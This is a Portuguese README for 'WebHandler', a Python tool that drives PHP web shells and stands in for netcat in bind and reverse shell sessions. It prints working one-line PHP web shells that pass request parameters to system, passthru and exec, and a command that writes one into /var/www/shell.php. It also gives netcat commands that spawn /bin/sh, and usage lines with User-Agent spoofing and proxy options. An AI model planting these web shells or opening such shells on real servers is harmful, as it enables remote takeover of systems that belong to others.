
Simulador de Bash para controlar um servidor usando funções de sistema do PHP.
Um handler para funções de sistema do PHP e também um handler alternativo ao 'netcat'
O WebHandler tenta simular um 'prompt do bash do Linux' para manipular e processar:
- Funções de execução de programas PHP _(por exemplo, `system`, `passthru`, `exec`, etc.)_
- Conexões de bind shell
- Conexões de reverse shell
Outro recurso é falsificar o campo "User-Agent" no cabeçalho HTTP. (--random-angent).
Ele também suporta proxies HTTP (--proxy http://<ip>:<port>)
O WebHandler funciona para requisições POST e GET:
<?php system($_GET['cmd']); ?><?php passthru($_REQUEST['cmd']); ?><?php echo exec($_POST['cmd']); ?>O WebHandler é um substituto para conexões netcat.
Um exemplo de conexão bind (por exemplo, nc -lvvp 1234 -e /bin/sh)
Normalmente o usuário faria:
netcat -l -p 1234nc -lvvp 1234Um exemplo de conexão reversa (por exemplo, nc 127.0.0.1 4321 -e /bin/sh)
Normalmente o usuário faria:
netcat -l -p 4321nc -lvvp 4321--Exemplo de arquivo:
echo '<?php system($_GET['cmd']); ?>' > /var/www/shell.php--url é um argumento obrigatório ao enviar requisições GET ou POST (por exemplo, uma conexão bind 'web based PHP'):
python webhandler.py --url http://www.mywebsite.com/shell.php?cmd=python webhandler.py --url http://www.mywebsite.com/shell.php --method POST --parameter cmdpython webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --random-agent --turbopython webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --proxy http://127.0.0.1:8080--listen é um argumento obrigatório quando estiver aguardando uma conexão (por exemplo, uma conexão reversa 'raw'):
python webhandler.py --listen 1234Se a versão do seu Python < 2.7.x, então argparse é obrigatório
Para instalá-lo, execute: sudo (apt-get|yum) install python-setuptools && sudo easy_install argparse OU sudo pip --install argparse.
readline é opcional. Este módulo é usado para fornecer recursos elaborados de edição de linha e histórico.
git é opcional. Isso permite que o projeto seja mantido atualizado.